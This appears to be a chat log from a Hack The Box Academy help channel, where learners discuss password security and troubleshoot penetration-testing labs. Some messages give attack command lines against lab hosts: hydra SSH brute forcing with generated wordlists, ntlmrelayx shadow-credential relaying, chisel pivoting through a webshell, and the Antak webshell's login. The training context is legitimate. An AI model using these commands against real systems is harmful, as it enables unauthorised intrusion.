it's FAR easier to make passwords that are 100% uncrackable, by anyone, effectively ever

like, so easy that it trips people up all the time

it's why password managers are great for secure passwords

right

because they remove the human element of password generation, which is the weakest

exactly

password cracking is human cracking

but now you have a single weak point

no password is best

my stpes are as follow

• i created a custom username and password for harry potter using cupp.py and userame_anarchy
• i used sed to reduce the number of pass to meet the password requirement of 8 char min,numbers and special char
  than i hydra -L usename -P password ssh://ip:port -t 4
  i reduce the pass count from 25000 to about 9000

ehhhh sorta

but the threatmodel that makes a modern pw manager a single point of failure is far beyond what most people are actually likely to ever encounter or even reliably plan for

sounds like it's forcing you to brute ssh

no password is more secure than a password 🙂 https://www.microsoft.com/en-us/security/blog/2023/05/04/how-microsoft-can-help-you-go-passwordless-this-world-password-day/

lol

you know what I do. I create a pass phrase but in a language(s) that don't exists but only has a meaning to me so I can remember it. Never write it down, if I have to write it down I burn it and put the ash in multiple different bins (tru story). (end result -> very long pass phrases that can be remembered easy and will never catch on a wordlist)

tokenization is a fun thing

yes the excercice is to brute the ssh

just extend the lab time for a bit; also are you sure you generated the lists properly, and that you followed all pw rules required

i believe that module goes over how to determine those min/max rules

its so easy to create "uncrackable" passwords, that im honestly shocked at how many people are pushing for killing passwords in favor of systems that move goal posts and usually complicate auth models for minimal if any security benefit

I get the sentiment but it seems rather misguided to me

MFA is also an essential thing in this age

because in reality, people don't use good passwords. they are too lazy and pick convenience over security. it's why you see so much password re-use, why you have dumb passwords like summer2019, 2020, etc.

even MFA is often implemented in ways that are NOT actually MFA

how do you realistically do MFA if you say brick your authenticator and now its impossible to restore

sure, but people can use strong passwords and, better yet, we can secure even weak passwords with minimal effort

when you generate MFA the program also gives the "In case of emergency, use these" backup codes

which is advised to store in a secure/encrypted location

but they won't. have you ever supported any user in IT? lmao. they hate long/convulated/rotating passwords etc.

but now you're back to square one of having a password that can bypass the Multi factor

yes and they don't need to be long or convoluted

that's sorta my point, that's a bit of an old and somewhat uninformed model of pw security

but to them anything not in rockyou.txt is long and convoluted

Hey, I tried out doing the macos fundamentals module, and am I supposed to have access to a Mac somewhere? I only see the pwnbox. Is there something I'm missing?

rotating passwords is actually bad for security

yep

big asterisk on that one too actually, even though generally it's true

it forces people into those patterns

there's a question asking to query what version it is, so im assuming i should have access to an environment, but i don't see one. (I have never used academy). Can someone point me in the right direction?

because people often cycle through password1, password2, password3 [password 1 fell off], password1

the only thing that can be extended is the pw box not the target machine

i already know the answer to the question and i can ssh if i wanted to but it annoys me that i did not find it my self

apologizes if this is a stupid question

above the question: there should be a spawn target button

yes, rotation can and will cause people to use poor patterns, but that doesn't necessarily make it a bad thing inherently, and there are plenty of places where rotating passwords is not the net-negative a lot of people believe it is

there's also the intro to academy module which i highly recommend so you get used to it

There is no such button

Hybrid solution? You have your password[0] + the company rotates you a note with your new password[1] you combine these. So the PW keeps changing but you only worry about 1 of them yourself and no repetation

the words "spawn target" do not appear anywhere on the page

i'd read the section is it expecting you to use the pwnbox?

what module/section is this?

there's nothing in the pwnbox related to macos

OH

graphical interface section of macos fundamentals

it's asking you to give the version of mac running

there is no Mac

this module requires you to have a MacOS device

(or google a bunch)

okay so how would it have the specific version number if i'm supposed to bring my own Mac

I'm not so sure this would solve the issues that it might seem to, especially in the envs where rotation may end up being a net positive thing.

upon inspecting my the list of pass generatd with cupp.py , my pass is indeed in the generated list and so is my username in the username list.
it's simply taking to long to brute force it

it probably just accepts any macos version

lol

or press the hint button haha

the question could be updated as versions release

not buying an apple product just to do this module

doesn't mean the user updated their mac though

lol

it pays to read the module summary ¯_(ツ)_/¯

you can use a VM

if you can find a MacOS image

which sharing that would not be legal

I guess yeah I've never actually tried setting up a macos VM

could be good though, why not

not to mention: you'd have terrible performance

^^

is it not straightforward?

I have tried virtualising mac

considering Mac is designed for ARM processors; and most systems are AMD processors

it's a mac... ofc it's gonna be slow

the performance is dog shit

its painfully slow

if you're running a Mac on Mac hardware it's fine

the issue lies in using hardware not designed to run a Mac

imo contact support and see if they can give you a refund for the cubes

Macs are designed to run on a separate set of chipset instructions entirely

nah im going to virtualize it

have fun with 1 minute per frame

surely its not literally that bad

let me break it down; your vm is needing to translate hardware instructions from a different CPU chipset to another instruction set for a different type of CPU

I was very excited to have a mac vm but I deleted it in less than 5 minutes. It really is that bad (atleast back when I tried it)

i guess ill get to see how bad it is lol

just buy a mac brother. look at it as an investment in to your future self. 🙂

Good luck

unless they release a MacOS compatible with the AMD chipset

didn't they do a short thing with Intel, or did Intel provide them with ARM chipsets

Mac didnt use arm, only very recently. But couldn't you sidestep this issue by compiling for the system architecture anyway

I am guessing there are ways to run mac on non mac hardware efficiently (the hackintosh community would know better) but it wasnt worth the effort for me

sounds like some ricing is in the mix there

intel+arm --> m1

old OS versions and potentially a few modded drivers iirc

and a subset of specifically supported hardware

It isnt worth it for most people at that extent

yeah, especially if you want recent OS support

you can get some 4x ARM processors for free from oracle if youi need arm for some reason (server)

you can also rent apple systems in the cloud

yeah was about to suggest that

there's a handful of providers that offer essentially mac mini's as a service

ok is that a joke but.. why woudl

maybe for rendering? Adobe always fucks windows with crashes

testing and some assorted work like that yeah

^

also devving for Mac is a pain in the ass

I personally know a few app devs who use it for XCode

If a client pays you well and also compensates the server fees, why not?

yep

could BS more in #general, made the account. if this is not a channel for this

if you wanted to continue the crafted pw related discussion in there, i'm happy to elaborate on that as needed

though i might have covered your original question already

module - PASSWORD ATTACKS
section - Pass the Ticket (PtT) from Windows

I can't connect to my target using rdp.

[15:54:10:675] [4651:4652] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:54:10:675] [4651:4652] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[15:54:10:077] [4651:4652] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:54:10:077] [4651:4652] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

wrap the password in single quotes

$$ is a variable call to get the PID of the current shell

Thank you!

whenever a password or something contains special characters always wrap it

this sounds like something you should message/email support about my dude

Removing the message as it leaks your IP (doesn't matter if you are using a VPN or whatever)

Thanks, I didn't think this through

my friend is also on the same boat btw

like if you're just casually browsing, you get throttle

¯_(ツ)_/¯

could be a connection issue causing repeated requests

I cannot even use the chatbot

there's the email

customerops@hackthebox.com

thanks I guess

🙂

Hey all, can I DM someone regarding this question?
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.

Ive spent the last 45 minutes just trying to set the configuration for the Hunt, really frustrating for a simple question - Lab is taking 10 seconds for anything to respond

hello im having so much diffuclties in skills assessement I of AD enum&attacks module due to pivoting,i can't transfer chisel to the webshell so i can pivot and rdp to MS01

i also espaced the webshell and got a rev shell but nothing seems to work to transfer the files

the only thing i could've do is netsh and then rdp but im limited to using alot of tools

any help please?

why can't you transfer?

Colleagues I am doing the WPA/ WPA2 password cracking module exercise but at the time of converting the file trace so that it can be read hashcat I have an error with the tool cap2hccapx.bin which tells me that packagesCaptured.pcapng: Invalid pcap header How can I convert the captured packets in another way?

i get error when trying to directly upload chisel to webshell, in the revshell i tried smb, invokewebrequest after launching the uploadserver in my attack host

Hi everyone! Pls help me with task in NTLM Relay Attacks module - Advanced NTLM Relay Attacks Targeting Kerberos section. Task is to relay cjaq’s HTTP NTLM authentication over LDAP to create shadow credentials for jperez user. I’m following the instructions in presented in the section but relay doesn’t work 😦 ntlmrelayx outputs : connection from INLANEFREIGHT.LOCAL\CJAQ@172.16.117.60 controlled, but there are no more targets left. Smb and http servers are OFF in responder.conf respectively

but whenever i do wget its gives me error and chisel doesnt transfer

also tried the other methods but doeesnt seem to work

what's the error? did you set up the web server right?

if I remember right you need to use hashcat v6.1.1

what about the other side

also tried python3 -m http-server but didnt work

hcxpcapngtool

the other side give no error whatever command you put in

so you probably can't say whats happening under the commands i write in ps

reset the lab, you should be able to transfer with the webshell itself

i'll restart it again for 10th times , did lose a lot of time yesterday and now im still stuck there lol

with the upload file in the webshell itself ?

yep

both that and wget works, done it lots of times

you might be doing something wrong

i don't think so , at least when trying to upload the files, every other files seems to transfer well, such as rubeus and powerview

but when its come to chisel specefically ... its crashes

Hello chat, I'm trying to do "Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" at the INTRO TO ASSEMBLY LANGUAGE. But when download the gdb.zip file i just find a gdb file which is.. the debugger not the binary to analize isn't it?. So.. what do i debbug?

and i get this error

don't remember running into this, are you supposed to relay to .60? isn't it supposed to be targeting DC if it's ldap?

the file is called gdb but it's a elf binary

run file gdb and it will tell you what it is

Yea I’m relaying to DC - ntlmrelayx.py -t ldap://INLANEFREIGHT.LOCAL\CJAQ@172.16.117.3 —shadow-credentials —shadow-target jperez <snip> . I’m running commands right from the section materials and it doesn’t work (weird..)

Connection comes from 172.16.117.60

save it to a different dir, /users/public maybe

yep

i tranfered it via invokewebrequest in my revshell

in different directory and worked

thanks man you always give me good assistance

i completed xss final assessment and get the final flag and its correct is there anymore type of xss in this challege that i can perform to test my skill in xss

let me test this out

Thank you very much! Just completed it 😄

This breaks one's head when you don't understand things 😦

hey XreOus can u tell me from where did you get the chisel.exe , mine doesn't work idk why , it throws an error : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

wait i think i know why

did you coerce?

use ligolo

never used it before lmao

is it easy to use?

i can't transfer the whole chisel directory, i transfer just the executable and the chisel command fails

hands down the best pivot tool

you only need the exe

from where you did download it?

maybe im transfering some wrong chisel lol

i need to take a look on this tool then

github, there's precompiled binaries

searched there but only found the chisel github page provided by HTB

https://github.com/jpillora/chisel/releases/tag/v1.9.1

there's no chisel.exe should i download the windows version and unzip it

yes.. it's in the zip

get the amd64 version

transfering ... hope it works

bruuuh finalllyy hahahaha

lets goo thank you man a lott

Nope, I missed it in instructions in section… Following the instructions I’ll coerce connection from computer account am I right? Don’t u mind if I ask you in DM?

yeah

I don't really have much to add, just follow the steps in the module

you can coerce from any account, doesn't have to be a machine account

Maybe someone who passed this module in chat can help?

huh? I have done it

are you having trouble with the question or the lab environment?

I was having issues with the lab being incredibly slow but ended up getting there after over an hour. I just wanted to cross check what I was doing was on the right track

if the lab is slow try switching VPN location

hey for brute forcing i dont find a sam password

and i made this order hydra ssh://10.129.82.96 -l sam -P mut_password.list but nothing :/

https://academy.hackthebox.com/module/147/section/1391

Hello guys i need help,

Module : Shell & Payloads
Seciton: Web Shell - Antak Webshell

my problem : I uploaded my file to the system, but it asks for a username and password to log in, I cannot find this login information.

i try htb-student but didnt work

cp /usr/share/nishang/Antak-WebShell/antak.aspx upload_antak.aspx
and user : htb-student mdp : htb-student

into upload_antak.aspx

before upload filee modify this section

im trying thanks

its work thanks

😉

anyone needing some help on Bypassing CSRF Tokens via CORS Misconfigurations can dm me, glad to help... tricky exercise

anyone for my problem ?

anybody interested in studying for OSCP dm me

@haughty stirrup

Did you find the answer? I have the same issue

i mean they were working on the skill exam for that module last i checked

so unless they skipped it

the powershell command is correct; you can specify the group name in the "Identity" field btw

instead of *

the reason it appears like it's freezing is because it's searching the user's rights over every identity in the Domain

Ah i see, i got it, thanks a lot 🙂 Is there a way i can see this in bloodhound?

not that I can think of off the top of my head

the Info you get from BH is the generic term for the rights abuse

I see, but that should not matter to much for the attack itself right?

well as you'll see when you retrieve the info, it's not as black/white as you think

there's a specific reason it has you retrieve that right info

Ok, thats good enough for me right now. I will keep going and see if i got it. Thanks for the help so far 🙂

it can take a few minutes to get the info

so don't be discouraged by it taking a while

patience is the name of the game

i need help for my problem plz https://academy.hackthebox.com/module/147/section/1391